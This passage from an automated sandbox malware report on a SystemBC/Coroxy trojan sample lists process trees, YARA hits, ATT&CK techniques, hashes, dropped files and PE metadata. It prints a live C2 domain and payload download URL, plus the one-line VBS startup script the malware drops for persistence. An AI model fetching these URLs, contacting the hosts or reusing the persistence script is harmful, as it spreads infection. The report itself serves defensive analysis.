                      Source: C:\ProgramData\faer\wopbv.exe Process created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe"
                      Source: C:\Users\user\AppData\Local\brokerutil.exe Process created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe"
                      Source: C:\ProgramData\faer\wopbv.exe Process created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Queries volume information: C:\Users\user\Desktop\uC4EETMDcz.exe VolumeInformation
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\ProgramData\faer\wopbv.exe Queries volume information: C:\ProgramData\faer\wopbv.exe VolumeInformation
                      Source: C:\ProgramData\faer\wopbv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\brokerutil.exe Queries volume information: C:\Users\user\AppData\Local\brokerutil.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\brokerutil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\ProgramData\faer\wopbv.exe Queries volume information: C:\ProgramData\faer\wopbv.exe VolumeInformation
                      Source: C:\ProgramData\faer\wopbv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Code function: 3_2_00401806 CoInitialize,GetSystemTime,CoUninitialize,3_2_00401806
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match File source: 1.2.uC4EETMDcz.exe.2be1354.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 11.2.wopbv.exe.322d6b8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.brokerutil.exe.2e1ba64.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.wopbv.exe.28ed188.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.2724225667.0000000000575000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.2726825474.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000B.00000002.3039485950.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000002.2378662559.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.2619060689.000000000297B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: uC4EETMDcz.exe PID: 3660, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: wopbv.exe PID: 368, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: brokerutil.exe PID: 3196, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: brokerutil.exe PID: 3916, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: wopbv.exe PID: 1456, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match File source: 1.2.uC4EETMDcz.exe.2be1354.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 11.2.wopbv.exe.322d6b8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.brokerutil.exe.2e1ba64.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.wopbv.exe.28ed188.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.2724225667.0000000000575000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.2726825474.00000000032CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000B.00000002.3039485950.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000002.2378662559.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.2619060689.000000000297B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: uC4EETMDcz.exe PID: 3660, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: wopbv.exe PID: 368, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: brokerutil.exe PID: 3196, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: brokerutil.exe PID: 3916, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: wopbv.exe PID: 1456, type: MEMORYSTR

                      ATT&CK matrix (table layout not preserved)
                      Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact
                      Techniques shown with a count (counts and column placement not recoverable): Scripting, Scheduled Task/Job, Process Injection, Masquerading, System Time Discovery, Archive Collected Data, Encrypted Channel, Disable or Modify Tools, Security Software Discovery, Non-Standard Port, Registry Run Keys / Startup Folder, Virtualization/Sandbox Evasion, Ingress Tool Transfer, DLL Side-Loading, Process Discovery, Non-Application Layer Protocol, Deobfuscate/Decode Files or Information, File and Directory Discovery, Application Layer Protocol, Obfuscated Files or Information, System Information Discovery, Software Packing
                      Behavior graph (image not preserved). Behavior Graph ID: 1576044; Sample: uC4EETMDcz.exe; Startdate: 16/12/2024; Architecture: WINDOWS; Score: 100
                      Processes: uC4EETMDcz.exe, wopbv.exe, wscript.exe, brokerutil.exe
                      Dropped files: C:\Users\user\AppData\Local\brokerutil.exe, PE32; C:\Users\user\AppData\...\brokerutil.vbs, ASCII; C:\Users\...\brokerutil.exe:Zone.Identifier, ASCII; C:\ProgramData\faer\wopbv.exe, PE32; C:\ProgramData\...\wopbv.exe:Zone.Identifier, ASCII
                      DNS/IP: wodresomdaymomentum.org 78.41.139.3, 4000, 49813, 49815 NEO-CUSTFR Norway; 45.155.249.199, 49821, 80 MEER-ASmeerfarbigGmbHCoKGDE Germany
                      Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected SystemBC; 8 other signatures; Drops VBS files to the startup folder; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Tries to detect virtualization through RDTSC time measurements; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes; Windows Scripting host queries suspicious COM object (likely to drop second stage)

                      Source | Detection | Scanner | Label | Link
                      uC4EETMDcz.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.Coroxy |
                      uC4EETMDcz.exe | 100% | Joe Sandbox ML | |

                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Local\brokerutil.exe | 100% | Joe Sandbox ML | |
                      C:\ProgramData\faer\wopbv.exe | 100% | Joe Sandbox ML | |
                      C:\ProgramData\faer\wopbv.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.Coroxy |
                      C:\Users\user\AppData\Local\brokerutil.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.Coroxy |

                      No Antivirus matches
                      No Antivirus matches

                      Source | Detection | Scanner | Label | Link
                      http://45.155.249.199/files/mailer/blue.exey | 0% | Avira URL Cloud | safe |
                      http://45.155.249.199/files/mailer/blue.exe% | 0% | Avira URL Cloud | safe |
                      wodresomdaymomentum.org | 0% | Avira URL Cloud | safe |
                      http://45.155.249.199/files/mailer/blue.exe | 0% | Avira URL Cloud | safe |
                      http://schemas.micr | 0% | Avira URL Cloud | safe |

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      wodresomdaymomentum.org | 78.41.139.3 | true | true | | unknown

                      Name | Malicious | Antivirus Detection | Reputation
                      http://45.155.249.199/files/mailer/blue.exe | false | Avira URL Cloud: safe | unknown
                      wodresomdaymomentum.org | true | Avira URL Cloud: safe | unknown

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://github.com/mgravell/protobuf-neti | uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp | false | | high
                      https://stackoverflow.com/q/14436606/23354 | uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://github.com/mgravell/protobuf-netJ | uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.000000000396C000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2744031290.0000000003E98000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3063157374.00000000042A8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://stackoverflow.com/q/11564914/23354; | uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp | false | | high
                      https://stackoverflow.com/q/2152978/23354 | uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp | false | | high
                      http://45.155.249.199/files/mailer/blue.exe% | wopbv.exe, 00000008.00000002.3390000700.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      https://github.com/mgravell/protobuf-net | uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp | false | | high
                      http://45.155.249.199/files/mailer/blue.exey | wopbv.exe, 00000008.00000002.3390352551.000000000125B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.micr | uC4EETMDcz.exe, 00000001.00000002.2396568477.00000000053C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://schemas.micro | uC4EETMDcz.exe, 00000001.00000002.2396568477.00000000053C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp | false
                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
45.155.249.199 | unknown | Germany | 34549 | MEER-ASmeerfarbigGmbHCoKGDE | false
78.41.139.3 | wodresomdaymomentum.org | Norway | 31367 | NEO-CUSTFR | true
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1576044
                                        Start date and time:2024-12-16 13:35:02 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 10s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:13
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:uC4EETMDcz.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:01b4e5031bce630ff9a75984dbce65e4.exe
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winEXE@14/6@1/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 95%
                                        • Number of executed functions: 416
                                        • Number of non-executed functions: 37
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: uC4EETMDcz.exe
Time | Type | Description
07:36:18 | API Interceptor | 1x Sleep call for process: uC4EETMDcz.exe modified
07:36:42 | API Interceptor | 2x Sleep call for process: wopbv.exe modified
13:36:19 | Task Scheduler | Run new task: Test Task17 path: C:\ProgramData\faer\wopbv.exe
13:36:21 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.155.249.199 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 45.155.249.199/files/winrar/eula.txt
78.41.139.3 | 8xp4Uw0ali.dll | malicious | SystemBC |
78.41.139.3 | Ewpeloxttug.exe | malicious | SystemBC |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
wodresomdaymomentum.org | 8xp4Uw0ali.dll | malicious | SystemBC | 78.41.139.3

Match | Associated Sample Name / URL | Detection | Threat Name | Context
NEO-CUSTFR | 8xp4Uw0ali.dll | malicious | SystemBC | 78.41.139.3
NEO-CUSTFR | Ewpeloxttug.exe | malicious | SystemBC | 78.41.139.3
NEO-CUSTFR | HDZgBTqTXm.exe | malicious | TeslaCrypt, TrojanRansom | 158.255.74.164
NEO-CUSTFR | DHL-INV-NAC.exe | malicious | FormBook, GuLoader | 158.255.78.78
NEO-CUSTFR | 5egerdHX2a | malicious | Mirai | 78.41.142.215
NEO-CUSTFR | iwah6jVhmw | malicious | Mirai | 85.208.197.8
MEER-ASmeerfarbigGmbHCoKGDE | cNF6fXdjPw.dll | malicious | Socks5Systemz | 45.155.250.225
MEER-ASmeerfarbigGmbHCoKGDE | x86_64.elf | malicious | Unknown | 45.90.96.167
MEER-ASmeerfarbigGmbHCoKGDE | arm.elf | malicious | Unknown | 45.90.96.167
MEER-ASmeerfarbigGmbHCoKGDE | spc.elf | malicious | Mirai | 45.90.96.167
MEER-ASmeerfarbigGmbHCoKGDE | sh4.elf | malicious | Mirai | 45.90.96.167
MEER-ASmeerfarbigGmbHCoKGDE | mips.elf | malicious | Mirai | 45.90.96.167
MEER-ASmeerfarbigGmbHCoKGDE | ppc.elf | malicious | Mirai | 45.90.96.167
MEER-ASmeerfarbigGmbHCoKGDE | arm5.elf | malicious | Mirai | 45.90.96.167
MEER-ASmeerfarbigGmbHCoKGDE | arm7.elf | malicious | Mirai | 45.90.96.167
MEER-ASmeerfarbigGmbHCoKGDE | arm6.elf | malicious | Mirai | 45.90.96.167
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1032736
                                            Entropy (8bit):7.919257819008481
                                            Encrypted:false
                                            SSDEEP:24576:vUfq8GRMFzYAUHh/T7TWY9Ixm9pwwfUCK3NbKJa4MvB:42RMcpVswfj84YB
                                            MD5:01B4E5031BCE630FF9A75984DBCE65E4
                                            SHA1:026F9B1F04DF0B009AA478A4A072DA9F38D695DD
                                            SHA-256:D7C59A22446F1C200C078A6E38131C755E1869717B939FA54B53360AF4D2A059
                                            SHA-512:4DFCEA7F892E12B2AC0A87F79B93FF678BEB57A7D71356B7FB733026E9C0941C906BA6EBF12BC7DFE3549BEC5B60293DFDE5170460F4E8E5FD2569FAB41109BD
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 58%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4_g.................F..........>e... ........@.. ....................................`..................................d..S....................P.. r........................................................... ............... ..H............text...DE... ...F.................. ..`.rsrc................H..............@..@.reloc...............N..............@..B................ e......H...........\................ ...........................................0..........(....*.*.(....*F .v..(....(....&*.(....(....*....0............ 7w..(....(..... .s..(....(.....s........o......s...........s......+..(.......&...,.......io......o.........,...o.......,...o...........,..o.......*...4....H..P........E.'l........9.?x........(.a.......2(.....o....*......(.... .v..(....(.....(....(...+o....*..(....*.~....-# .w..(.........(....o....s.........~....*.~....*.......*~(..
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1032736
                                            Entropy (8bit):7.919257819008481
                                            Encrypted:false
                                            SSDEEP:24576:vUfq8GRMFzYAUHh/T7TWY9Ixm9pwwfUCK3NbKJa4MvB:42RMcpVswfj84YB
                                            MD5:01B4E5031BCE630FF9A75984DBCE65E4
                                            SHA1:026F9B1F04DF0B009AA478A4A072DA9F38D695DD
                                            SHA-256:D7C59A22446F1C200C078A6E38131C755E1869717B939FA54B53360AF4D2A059
                                            SHA-512:4DFCEA7F892E12B2AC0A87F79B93FF678BEB57A7D71356B7FB733026E9C0941C906BA6EBF12BC7DFE3549BEC5B60293DFDE5170460F4E8E5FD2569FAB41109BD
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 58%
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4_g.................F..........>e... ........@.. ....................................`..................................d..S....................P.. r........................................................... ............... ..H............text...DE... ...F.................. ..`.rsrc................H..............@..@.reloc...............N..............@..B................ e......H...........\................ ...........................................0..........(....*.*.(....*F .v..(....(....&*.(....(....*....0............ 7w..(....(..... .s..(....(.....s........o......s...........s......+..(.......&...,.......io......o.........,...o.......,...o...........,..o.......*...4....H..P........E.'l........9.?x........(.a.......2(.....o....*......(.... .v..(....(.....(....(...+o....*..(....*.~....-# .w..(.........(....o....s.........~....*.~....*.......*~(..
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):86
                                            Entropy (8bit):4.65234334459712
                                            Encrypted:false
                                            SSDEEP:3:FER/n0eFHHoN+E2J5Hav1FNnHn:FER/lFHIN723o
                                            MD5:37A7A91DD1D964EA59D8DE29682E7978
                                            SHA1:9FB4FCC90640BFC7701DB85192A6EFB87A4C4A3F
                                            SHA-256:DDC01C5BA2DDA48EC311CFE05BB3BA7A1966AFA30241D46A74B368DECF996C69
                                            SHA-512:472A96E530989373ECC13962A7D1393F1B77ED4DE991E1E98E0E4EF2387DBF9FD9A828260DD69066C51ABCDFA149841B036695F79BAA57193AC637F808CF0674
                                            Malicious:true
                                            Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\brokerutil.exe"""
                                            Process:C:\Users\user\Desktop\uC4EETMDcz.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):244
                                            Entropy (8bit):3.335327093208964
                                            Encrypted:false
                                            SSDEEP:3:KcMPVXJSl/lm2/SblM6lEjlDryKPdN4atttxgyS9S7ARjLlAS/M2z0nlDQskXlN3:H/82abhEZPyKdtE9+AQy0lDY1NXt1
                                            MD5:7D783CD2172D188CBAA1E95204D3F0CF
                                            SHA1:10DF4835996D6B4EFD63C7D1822331B5C01749E8
                                            SHA-256:500352971E5794171790BA4B68ECB7C544F83FD71436EFF59BF3DBE578F84C60
                                            SHA-512:8F9DC87C2792771A067F561C8C7C85E3D59E492F8D843C73C21905CE13667713AEC42662088F4DA42DD8B131C18FD8197FD11405698D3B563FA49E19D98B46F9
                                            Malicious:false
                                            Preview:.......K...O.b......F.......<... .....\.......... ......................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.f.a.e.r.\.w.o.p.b.v...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.........L.....................................
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.919257819008481
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:uC4EETMDcz.exe
                                            File size:1'032'736 bytes
                                            MD5:01b4e5031bce630ff9a75984dbce65e4
                                            SHA1:026f9b1f04df0b009aa478a4a072da9f38d695dd
                                            SHA256:d7c59a22446f1c200c078a6e38131c755e1869717b939fa54b53360af4d2a059
                                            SHA512:4dfcea7f892e12b2ac0a87f79b93ff678beb57a7d71356b7fb733026e9c0941c906ba6ebf12bc7dfe3549bec5b60293dfde5170460f4e8e5fd2569fab41109bd
                                            SSDEEP:24576:vUfq8GRMFzYAUHh/T7TWY9Ixm9pwwfUCK3NbKJa4MvB:42RMcpVswfj84YB
                                            TLSH:9825231927CC0A35CDEE3EF6D1B2D2153B3DD1DB2322C389984493899491FE68927B5B
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4_g.................F..........>e... ........@.. ....................................`................................
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x4f653e
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x675F3401 [Sun Dec 15 19:54:41 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Signature Valid:false
                                            Signature Issuer:CN=Microsoft Marketplace CA G 027, OU=EOC, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                            Not Before, Not After
                                            • 13/09/2024 02:07:32 16/09/2024 02:07:32
                                            Subject Chain
                                            • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                            Version:3
                                            Thumbprint MD5:F5B7BCC826B78AEF763836D82EF67DBA
                                            Thumbprint SHA-1:FDA943641AAA87F7EA61F7347FE92B9C3ABC3825
                                            Thumbprint SHA-256:51B79453AFF83A66E1EC1E1139143AAB93E8BC7D4E00E922857DEAE48B2F0543
                                            Serial:33003E3B13F845F76C76D487AB0001003E3B13
                                            Instruction
                                            jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf64e8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf8000 | 0x600 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xf5000 | 0x7220 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfa000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

